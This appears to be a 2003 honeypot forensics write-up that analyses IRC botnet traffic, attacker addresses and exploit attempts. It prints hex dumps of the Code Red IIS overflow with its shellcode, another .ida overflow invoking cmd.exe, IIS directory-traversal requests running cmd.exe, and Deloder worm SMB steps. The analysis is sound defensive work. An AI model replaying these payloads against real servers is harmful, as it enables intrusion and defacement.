Scan of the Month 27

Nir Hauser

hauserns at georgetown dot edu

April 18, 2003

 

 

Tools:

 

Ethereal: http://www.ethereal.com/

Snort: http://www.snort.org/

A simple rules.txt file for Snort:

 

alert ip any any -> any any

output alert_fast: alert.fast

 

Running snort with this ruleset creates a file alert.fast that contains a summary of the network traffic.  It also creates one directory for each TCP or UDP session of every IP address involved in the log.  This is a powerful tool in combination with Ethereal.

 

Beginning Questions

 

 

1.  What is IRC?

 

Internet Relay Chat (IRC) is system that allows multiple users to enter a chatroom and chat with one another.  It is set up on a client/server architecture.  IRC clients such as mIRC log in to the IRC server where they find multiple channels to join.  IRC also allows for file transfer and other operations.

 

2. What message is sent by an IRC client when it asks to join an IRC network?

 

First, the IRC clients sends a TCP packet with the SYN flag to port 6667.  The client and server then perform a handshake.  This is what it looks like:

 

From Ethereal:

35794 414909.249998 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384

35795 414909.304675 209.196.44.172        172.16.134.191        TCP      6667 > 1152 [SYN, ACK] Seq=4266393801 Ack=4114925006 Win=32120

35796 414909.305433 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [ACK] Seq=4114925006 Ack=4266393802 Win=17520

 

The IRC client then sends an IRC packet requesting to use a nickname.  Here is the message that the honeypot sends to the IRC server 209.196.44.172:

 

NICK rgdiuggac

USER rgdiuggac localhost localhost :rgdiuggac

 

The IRC client then sends a request to join a channel. Here is the message that the honeypot sends to the IRC server 209.196.44.172:

 

JOIN #xŕéüîéđěx :sex0r

WHO rgdiuggac

 

Here the honeypot says it wants to join channel #xŕéüîéđěx and it identifies itself as rgdiuggac.

 

3.  What is a botnet?

 

A botnet is a collection of compromised computers that have joined an IRC channel.  At first, a Trojan Horse is somehow installed on the compromised computers.  That Trojan then proceeds to attempt to log on to an IRC server.  Once it logs on to the appropriate channel it awaits a command.  A botnet can consist of thousands of zombie computers that sit around and wait for an opportunity to do something malicious. 

 

4.  What are botnets commonly used for?

Botnets are always malicious.  The users whose computers have logged onto the botnet are always unaware that their computers have done so.  A botnet can command all of its zombies to begin a Distributed Denial of Service (DDoS) against a designated computer.  It can also order each of its members to attack other computers, install the Trojan, and invite them into the botnet.

 

5.  What TCP ports does IRC generally use?

IRC generally uses ports 6667 through 7000.  In this Scan, IRC always uses port 6667.

 

6.  What is a binary log file and how is one created?

 

A binary log file keeps track of all network traffic that passes through the host machine.  It is created using a sniffer such as Snort which listens to all traffic on the network and records it in the binary file.  Snort can then analyze the raw data and present it in a human readable form.  Ethereal can read the binary log and present the data in a GUI.  Once the log is loaded into Ethereal or Snort, filters can be applied to it in order to extract specific packets.

 

7.  What IRC servers did the honeypot, which has the IP address 172.16.134.191, communicate with?

 

The honeypot attempted to log onto the following IRC servers:

66.33.65.58

63.241.174.144

217.199.175.10

209.126.161.29

209.196.44.172

 

as you can see from the following entries:

34821 412112.717027 172.16.134.191        209.126.161.29        TCP      1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0

35739 412630.079021 172.16.134.191        66.33.65.58           TCP      1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0

35745 413286.204510 172.16.134.191        63.241.174.144        TCP      1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0

35762 413307.053048 172.16.134.191        217.199.175.10        TCP      1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0

35794 414909.249998 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0

 

The honeypot successfully logs onto 209.196.44.172.

 

8.  During the observation period, how many distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172?

 

During the observation period, 6639 distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172.  This includes the hosts that were already logged in to 209.196.44.172 when the honeypot logged on.  When an IRC client logs into a channel, the server tells it the names of all the users that are currently logged in.   I counted this number.  I then monitored all the IRC responses afterwards and used a script to get the usernames of all the IRC clients that interacted with the server.  I added these two numbers to come to 6639.

 

9.  Assuming that each botnet host has a 56 kbps network link, what is the aggregate bandwidth of the botnet?

 

56kbps x 6639 = 371784kbps = 371.784 Mbps

 

Intermediate Questions

 

1)  What IP source addresses were used in attacking the honeypot?

 

The following IP Addresses were used in attacking the honeypot:

 

12.252.61.161

12.253.142.87

12.83.147.97

129.116.182.239

141.149.155.249

141.85.37.78

144.134.109.25

148.235.82.146

162.33.189.252

164.125.76.48

168.226.98.61

168.243.103.205

169.254.205.177

172.16.134.191

192.130.71.66

192.215.160.106

194.199.201.9

195.36.247.77

195.67.251.197

200.135.228.10

200.50.124.2

200.60.202.74

200.66.98.107

200.74.26.73

200.78.103.67

202.63.162.34

203.106.55.12

203.115.96.146

203.170.177.8

204.50.186.37-

205.180.159.35

206.149.148.192

207.6.77.235

208.186.61.2-

209.45.125.110

209.45.125.69

210.111.56.66

210.12.211.121

210.203.189.77

210.214.49.227

210.22.204.101

210.58.0.25

211.149.57.197

212.110.30.110

212.122.20.74

212.162.165.18

212.243.23.179

213.107.105.72

213.116.166.126

213.122.77.74

213.170.56.83

213.217.55.243

213.23.49.158

213.44.104.92

213.7.60.57

213.84.75.42

216.170.214.226

216.192.145.21

216.228.8.158

216.229.73.11

217.1.35.169

217.222.201.82

217.227.245.101

217.227.98.82

217.35.65.9

218.163.9.89

218.237.70.119

218.244.66.32

218.25.147.83

218.4.48.74

218.4.65.115

218.4.87.137

218.4.99.237

218.87.178.167

218.92.13.142

219.118.31.42

219.145.211.132

219.145.211.3

219.65.37.37

219.94.46.57

24.107.117.237

24.161.196.103

24.167.221.106

24.197.194.106

24.74.199.104

4.33.244.44

4.64.221.42

61.11.11.54

61.111.101.78

61.132.88.50

61.132.88.90

61.134.45.19

61.14.66.92

61.140.149.137

61.150.120.72

61.150.72.7

61.155.126.150

61.177.154.228

61.177.56.98

61.177.62.66

61.185.212.166

61.185.215.42

61.185.242.190

61.185.29.9

61.203.104.148

61.55.71.169

61.8.1.64

62.127.38.198

62.150.170.134

62.150.170.232

62.194.4.114

62.201.96.159

62.251.129.118

64.17.250.240

64.254.203.68

66.139.10.15

66.190.67.122

66.233.4.225

66.73.160.240

66.8.163.125

66.81.131.17

66.92.135.108

67.201.75.38

67.81.161.166

68.115.33.110

68.152.53.138

68.154.11.82

68.169.174.108

68.37.54.69

68.45.123.130

68.84.210.227

80.181.116.202

81.114.77.37

81.202.125.5

81.50.177.167

81.57.217.208

 

 

2.  What vulnerabilities did attackers attempt to exploit?

 

Windows 2000 NetBIOS Vulnerabilities

 

Windows uses Server Message Block (SMB) to allow client applications to read / writes to files on the server and request services.  Before Windows 2000, the only way to issue SMB commands was to connect to ports 137, 138, or 139 on the Windows machine and communicate over NetBIOS.  Windows 2000 allows a client to issue SMB commands without the NetBIOS through a TCP/IP connection on port 445.  When a client wishes to communicate with SMB on a Windows 2000 machine, it usually sends the request to ports 139 and 445.  If port 445 responds, the client proceeds to communicate over that port.  Otherwise, only port 137 is used.  This information is useful, because if an attacker queries port 137 but ignores port 445, it might mean that the attacker thinks it is dealing with a version of Windows older than Windows 2000.

 

Attackers attempted to connect to the honeypot through the NetBIOS.  The NetBIOS is used by Windows machines to communicate over a LAN.  File and printer sharing is done using SMB commands over NetBIOS.  Many attackers issued a query to the honeypot’s NetBIOS.  Once such query looked like this:

 

1 0.000000    219.118.31.42         172.16.134.191        NBNS     Name query NBSTAT *<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>

 

Some attackers attempted to map to the honeypot’s C drive through the NetBIOS.  This is generally the command used in previous versions of Windows, for this reason, none of these succeeded.  That query looked like this:

 

8 0.514274    219.118.31.42         172.16.134.191        SMB      Tree Connect AndX Request, Path: \\PC0191\C

           

Some attackers attempted to connect to honeypot’s IPC$ Share. The IPC$ share is also accessed through SMB. Clients can use the IPC$ Share to send commands to the server.  Once an attacker logs into the IPC$ share he can issue Remote Procedure Calls (RPC).    RPC is a client/server infrastructure that allows a client to issue commands to the server through a programmer’s interface.  Because the Administrator password on the honeypot is NULL, an attacker can log in with full Administrator privileges.  The query looks like this:

 

925 322205.478544 210.22.204.101        172.16.134.191        SMB      Tree Connect AndX Request, Path: \\172.16.134.191\IPC$

 

W32.HLLW.Deloder Worm

 

61.111.101.78 attacks the honeypot with the W32.HLLW.Deloder worm.  The worm connects to the honeypot’s IPC$ share as described earlier.  It then attempts a series of passwords including the NULL password.  Once it connects, it installs a Trojan Backdoor called INST.EXE.  It also extracts the legitimate system utility PSEXESVC.EXE by SysInternals on the victim’s computer.  We can see that the Deloder installs PSEXESVC.EXE  and INST.EXE in the following packets:

 

33280 412046.012158 61.111.101.78         172.16.134.191        SMB      NT Create AndX Request, Path: \System32\PSEXESVC.EXE

33678 412072.276580 61.111.101.78         172.16.134.191        SMB      NT Create AndX Request, Path: \System32\inst.exe

 

When we see these packets, we recognize the signature of the Deloder Worm.

 

Code Red Worm

 

Code Red is a self-propagating malicious worm that exploits a buffer overflow in IIS.  First, 68.169.174.108 scanned the honeypot to see if it has IIS and is vulnerable to Code Red.  We can tell that it is most likey the Retina Code Red Scanner because it issues the following query to IIS:

 

GET /pagerror.gif HTTP/1.1\r\n

 

In the packet ?

 

65 28542.955886 68.169.174.108        172.16.134.191        HTTP     GET /pagerror.gif HTTP/1.1

 

218.25.147.83 later begins a Code Red attack against IIS running on the honeypot.  Code Red uses a buffer overflow to break IIS.  It sends the following four HTTP packets. 

 

<packet #1>

32885 396968.463209 218.25.147.83         172.16.134.191        HTTP     GET

 

0000  00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00   ..i...........E.

0010  05 d4 02 b0 40 00 6e 06 6d dc da 19 93 53 ac 10   ....@.n.m....S..

0020  86 bf 0e 32 00 50 94 47 ec 82 e7 ec 78 a8 50 18   ...2.P.G....x.P.

0030  44 10 75 2d 00 00 2f 64 65 66 61 75 6c 74 2e 69   D.u-../default.i

0040  64 61 3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   da?NNNNNNNNNNNNN

0050  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0060  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0070  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0080  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0090  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00a0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00b0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00c0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00d0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00e0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

00f0  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0100  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0110  4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNNNNNNNNNN

0120  4e 4e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00   NNN.............

0130  00 00 c3 03 00 00 00 78 00 fa 20 20 48 54 54 50   .......x..  HTTP

0140  2f 31 2e 30 0d 0a 38 25 75 63 62 64 33 25 75 37   /1.0..8%ucbd3%u7

0150  38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25   801%u9090%u6858%

0160  75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39   ucbd3%u7801%u909

0170  30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30   0%u9090%u8190%u0

0180  30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25   0c3%u0003%u8b00%

0190  75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37   u531b%u53ff%u007

01a0  38 25 75 30 30 30 30 25 75 30 30 3d 61 20 20 48   8%u0000%u00=a  H

01b0  54 54 50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74   TTP/1.0..Content

01c0  2d 74 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a   -type: text/xml.

01d0  48 4f 53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f   HOST:www.worm.co

01e0  6d 0a 20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43   m. Accept: */*.C

01f0  6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33   ontent-length: 3

0200  35 36 39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00   569 ....U.......

0210  00 53 56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8   .SVW............

0220  cc cc cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00   ........p.......

etc ...

 

<packet #2>

32886 396968.482227 218.25.147.83         172.16.134.191        HTTP     Continuation

(hex is not important for this packet)

 

<packet #3>

32888 396969.003930 218.25.147.83         172.16.134.191        HTTP     Continuation

 

0000  00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00   ..i...........E.

0010  04 93 02 b5 40 00 6e 06 6f 18 da 19 93 53 ac 10   ....@.n.o....S..

0020  86 bf 0e 32 00 50 94 47 f7 da e7 ec 78 a8 50 18   ...2.P.G....x.P.

0030  44 10 de 1f 00 00 ff ff 8b 85 4c fe ff ff 83 c0   D.........L.....

0040  01 89 85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11   ...L.....d......

0050  85 d2 74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff   ..t.....j...L...

0060  50 8b 4d 08 8b 51 64 52 8b 85 78 fe ff ff 50 ff   P.M..QdR..x...P.

0070  95 c0 fe ff ff 3b f4 90 43 4b 43 4b c7 85 4c fe   .....;..CKCK..L.

0080  ff ff 00 00 00 00 8b 8d 68 fe ff ff 83 c1 07 89   ........h.......

0090  8d 64 fe ff ff eb 1e 8b 95 64 fe ff ff 83 c2 01   .d.......d......

00a0  89 95 64 fe ff ff 8b 85 4c fe ff ff 83 c0 01 89   ..d.....L.......

00b0  85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11 85 d2   .L.....d........

00c0  74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff 50 8b   t.....j...L...P.

00d0  8d 68 fe ff ff 83 c1 07 51 8b 95 78 fe ff ff 52   .h......Q..x...R

00e0  ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b 8b 45 08   ......;..CKCK.E.

00f0  8b 48 70 89 8d 4c fe ff ff 8b f4 6a 00 8b 95 4c   .Hp..L.....j...L

0100  fe ff ff 52 8b 45 08 8b 48 78 51 8b 95 78 fe ff   ...R.E..HxQ..x..

0110  ff 52 ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c6   .R......;..CKCK.

0120  85 fc fe ff ff 00 8b f4 6a 00 68 00 01 00 00 8d   ........j.h.....

0130  85 fc fe ff ff 50 8b 8d 78 fe ff ff 51 ff 95 c4   .....P..x...Q...

0140  fe ff ff 3b f4 90 43 4b 43 4b 89 85 4c fe ff ff   ...;..CKCK..L...

0150  8b f4 8b 95 78 fe ff ff 52 ff 95 c8 fe ff ff 3b   ....x...R......;

0160  f4 90 43 4b 43 4b e9 0c fb ff ff eb fe e8 8c f5   ..CKCK..........

0170  ff ff eb 30 58 83 c0 05 55 57 53 56 50 6a 3c 8b   ...0X...UWSVPj<.

0180  f0 83 c6 0c 56 68 00 01 00 00 ff 70 08 ff 74 24   ....Vh.....p..t$

0190  28 ff 10 58 50 ff 74 24 18 ff 50 04 58 5e 5b 5f   (..XP.t$..P.X^[_

01a0  5d ff 20 90 e8 cb ff ff ff e8 7b f9 ff ff d0 f2   ]. .......{.....

01b0  27 6e f5 18 03 75 4b 3c 43 00 00 01 00 00 78 56   'n...uK<C.....xV

01c0  34 12 b8 78 56 34 12 58 50 8b bd 68 fe ff ff 89   4..xV4.XP..h....

01d0  47 f2 c3 8b 44 24 0c 05 b8 00 00 00 c7 00 4a ff   G...D$........J.

01e0  46 00 33 c0 c3 eb ec e8 f1 f4 ff ff 4c 6f 61 64   F.3.........Load

01f0  4c 69 62 72 61 72 79 41 00 47 65 74 53 79 73 74   LibraryA.GetSyst

0200  65 6d 54 69 6d 65 00 43 72 65 61 74 65 54 68 72   emTime.CreateThr

0210  65 61 64 00 43 72 65 61 74 65 46 69 6c 65 41 00   ead.CreateFileA.

0220  53 6c 65 65 70 00 47 65 74 53 79 73 74 65 6d 44   Sleep.GetSystemD

0230  65 66 61 75 6c 74 4c 61 6e 67 49 44 00 56 69 72   efaultLangID.Vir

0240  74 75 61 6c 50 72 6f 74 65 63 74 00 09 69 6e 66   tualProtect..inf

0250  6f 63 6f 6d 6d 2e 64 6c 6c 00 54 63 70 53 6f 63   ocomm.dll.TcpSoc

0260  6b 53 65 6e 64 00 09 57 53 32 5f 33 32 2e 64 6c   kSend..WS2_32.dl

0270  6c 00 73 6f 63 6b 65 74 00 63 6f 6e 6e 65 63 74   l.socket.connect

0280  00 73 65 6e 64 00 72 65 63 76 00 63 6c 6f 73 65   .send.recv.close

0290  73 6f 63 6b 65 74 00 09 77 33 73 76 63 2e 64 6c   socket..w3svc.dl

02a0  6c 00 00 47 45 54 20 00 3f 00 20 20 48 54 54 50   l..GET .?.  HTTP

02b0  2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79   /1.0..Content-ty

02c0  70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a 48 4f 53   pe: text/xml.HOS

02d0  54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f 6d 0a 20   T:www.worm.com.

02e0  41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 6f 6e 74   Accept: */*.Cont

02f0  65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 35 36 39   ent-length: 3569

0300  20 0d 0a 0d 0a 00 63 3a 5c 6e 6f 74 77 6f 72 6d    .....c:\notworm

0310  00 4c 4d 54 48 0d 0a 3c 68 74 6d 6c 3e 3c 68 65   .LMTH..<html><he

0320  61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71   ad><meta http-eq

0330  75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70   uiv="Content-Typ

0340  65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74   e" content="text

0350  2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65   /html; charset=e

0360  6e 67 6c 69 73 68 22 3e 3c 74 69 74 6c 65 3e 48   nglish"><title>H

0370  45 4c 4c 4f 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68   ELLO!</title></h

0380  65 61 64 3e 3c 62 61 64 79 3e 3c 68 72 20 73 69   ead><bady><hr si

0390  7a 65 3d 35 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72   ze=5><font color

03a0  3d 22 72 65 64 22 3e 3c 70 20 61 6c 69 67 6e 3d   ="red"><p align=

03b0  22 63 65 6e 74 65 72 22 3e 57 65 6c 63 6f 6d 65   "center">Welcome

03c0  20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77    to http://www.w

03d0  6f 72 6d 2e 63 6f 6d 20 21 3c 62 72 3e 3c 62 72   orm.com !<br><br

03e0  3e 48 61 63 6b 65 64 20 42 79 20 43 68 69 6e 65   >Hacked By Chine

03f0  73 65 21 3c 2f 66 6f 6e 74 3e 3c 2f 68 72 3e 3c   se!</font></hr><

0400  2f 62 61 64 79 3e 3c 2f 68 74 6d 6c 3e 20 20 20   /bady></html>  

0410  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0420  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0430  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0440  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0450  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0460  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0470  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0480  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

0490  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  

04a0  20   

 

<packet #4>

32889 396969.032378 218.25.147.83         172.16.134.191        HTTP     Continuation

(hex is not important for this packet)

 

The signature of the Code Red worm can be seen at the end of the third packet. It displays the following HTML message to the victim:

 

<html><head><meta http-equiv="Content-Type" content="text/html;
charset=English"><title>HELLO!</title></head><bady><hr size=5><font
color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked
By Chinese!</font></hr></bady></html>
 
 

Other IIS Buffer Overflows

 

210.22.204.101 and 24.197.194.106 attempt to exploit IIS vulnerability using a buffer overflow.  The following two packets demonstrate 210.22.204.101’s attack:  (Notice that the last few lines of the second packet, the attacker attempts to run cmd.exe.  This is the Windows command prompt)

 

 

<packet #1>

 1839 322275.638746 210.22.204.101        172.16.134.191        HTTP     GET

/NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

 

0000  00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00   ..i...........E.

0010  05 dc 6b 08 40 00 6b 06 d7 6c d2 16 cc 65 ac 10   ..k.@.k..l...e..

0020  86 bf 06 8e 00 50 76 16 a7 9e 8b 5a 44 20 50 10   .....Pv....ZD P.

0030  fa f0 f3 19 00 00 47 45 54 20 2f 4e 55 4c 4c 2e   ......GET /NULL.

0040  49 44 41 3f 43 43 43 43 43 43 43 43 43 43 43 43   IDA?CCCCCCCCCCCC

0050  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0060  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0070  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0080  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0090  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00a0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00b0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00c0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00d0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00e0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

00f0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0100  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0110  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC

0120  43 43 43 43 43 43 43 43 43 43 43 43 25 75 30 61   CCCCCCCCCCCC%u0a

0130  65 62 25 75 62 38 39 30 25 75 64 61 63 66 25 75   eb%ub890%udacf%u

0140  37 37 65 65 25 75 30 30 30 30 25 75 30 30 30 30   77ee%u0000%u0000

0150  25 75 38 33 38 62 25 75 30 30 39 34 25 75 30 30   %u838b%u0094%u00

0160  30 30 25 75 34 30 38 62 25 75 30 35 36 34 25 75   00%u408b%u0564%u

0170  30 31 35 30 25 75 30 30 30 30 25 75 65 30 66 66   0150%u0000%ue0ff

0180  25 75 39 30 39 30 3d 78 26 90 90 90 90 90 90 90   %u9090=x&.......

0190  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................

etc...

 

<packet #2>

1840 322275.638746 210.22.204.101        172.16.134.191        HTTP  Continuation

 

abbreviated hex ...

0250  c9 eb f6 fa d8 fd fd eb fc ea ea 99 ea eb 7f ee   ................

0260  a8 e9 7f ee 99 fa 5e f2 f8 26 63 6d 64 2e 65 78   ......^..&cmd.ex

0270  65 24 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73   e$ HTTP/1.1..Hos

0280  74 3a 20 31 37 32 2e 31 36 2e 31 33 34 2e 31 39   t: 172.16.134.19

0290  31 3a 38 30 0d 0a 0d 0a                           1:80....

 

Directory Traversing Vulnernability

 

24.197.194.106 also attempted to tranverse the honeypot’s directories through IIS. Here a few examples of the HTTP it issued:

 

HEAD /script/..\../..\../..\../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir /system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n

HEAD /scripts/..%\../..%\../..%\../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/..%\../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n

HEAD /scripts/..\../..\../..\winnt/system32/cmd.exe?/c+dir c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/..\../winnt/system32/cmd.exe?/c+dir r +dir HTTP/1.0\n

HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n

HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir +dir HTTP/1.0\n

 

Notice that the attacker was attempted to access cmd.exe.  This is the Windows Command Prompt that would allow the hacker to execute commands on the Honeypot.

 

FX-Scanner

 

The attack on the honeypot is a variant of the FX-Scanner.  The malicious program:

Sends a ping (ICMP)

Accesses port 80 (HTTP)

Accesses port 57 (no service is known for this port)

Accesses port 21 (FTP)

 

A series of different IP addresses: 192.130.71.66, 213.23.49.158, 141.85.37.78, 203.170.177.8 aroused suspicion that at FX-Scanner-like program was being used.  There are no known services offered on port 57.  Yet both 192.130.71.66 and 213.23.49.158 sent the honeypot packets on port 57 and port 80.  141.85.37.78 and 203.170.177.8 both sent the honeypot packets attempting to connect to FTP on port 21.  The honeypot did not receive a Ping.  I suspect that all these IP addresses were coordinated under one attack, but there is no way to know for sure.  It is possible that they were isolated incidents.

 

DameWare Remote Control Agent Vulnerability

 

210.22.204.101 also scans DameWare Remote Control on port 6129.  It sends the following packet attempting to connect with the port:

 

2052 322422.446563 210.22.204.101        172.16.134.191        TCP      3870 > 6129 [SYN] Seq=2495283602 Ack=0 Win=64240 Len=0

 

Microsoft SQL Server Vulnerability

 

Many attackers attempted to connect to the honeypot on port 1433 looking for Microsoft SQL Server.  The query looked like this:

43 21871.711441 210.111.56.66         172.16.134.191        TCP      1929 > ms-sql-s [SYN] Seq=786885643 Ack=0 Win=64240 Len=0

 

The attackers were most likely attempted to spread the Microsoft SQLslammer worm.  On Saturday, January 26, 2003, the worm shut down a large part of the Internet.  It uses a buffer overflow to break into MS SQL-Server.  Once it infects the host, it sends copies of itself out throughout the Internet.

 

rpc.statd Vulnerability

 

A few attackers attempted to connect to the honeypot on port 111 looking for rpc.statd.  The rpc.statd program has an input validation problem which allows an attacker to exploit it.  This program is installed by default in Linux machines.   This is what the packet looked like:

246 146489.407148 204.50.186.37         172.16.134.191        TCP      4069 > sunrpc [SYN] Seq=2674258792 Ack=0 Win=32120 Len=0

 

Hack´a´Tack

 

A few attackers sent the honeypot UDP packets on port 28431.  That port is susceptible to the Hack´a´Tack virus which attacks which includes Remote Access, a keylogger, an IP scanner, and also steals passwords.  This is what the packet looked like:

 

10 6750.116690 62.150.170.134        172.16.134.191        UDP      Source port: 28432  Destination port: 28431

 

SOCKS Vulnerability

 

A few attackers attempted to connect to the honeypot on port 1080 looking for the SOCKS proxy service.  Hackers often use it to bounce packets off of it and attack a third party while it looks like the packets are coming from the victim, not the attacker.  This is what the packet looked like:

 

162 98205.654304 200.74.26.73          172.16.134.191        TCP      25590 > 1080 [SYN] Seq=410779648 Ack=0 Win=512 Len=0

 

Who Did What?  A list of attempted attacks

 

Windows 2000 NetBIOS vulnerabilities.

The following IP source addresses accessed ports 137, 139, or 455 in an attempt to exploit the NetBIOS and SMB:

129.116.182.239

141.149.155.249

144.134.109.25

148.235.82.146

162.33.189.252

164.125.76.48

168.226.98.61

169.254.205.177

172.168.0.154

195.36.247.77

195.67.251.197

200.60.202.74

200.66.98.107

200.78.103.67

202.63.162.34

203.106.55.12

203.115.96.146

207.6.77.235

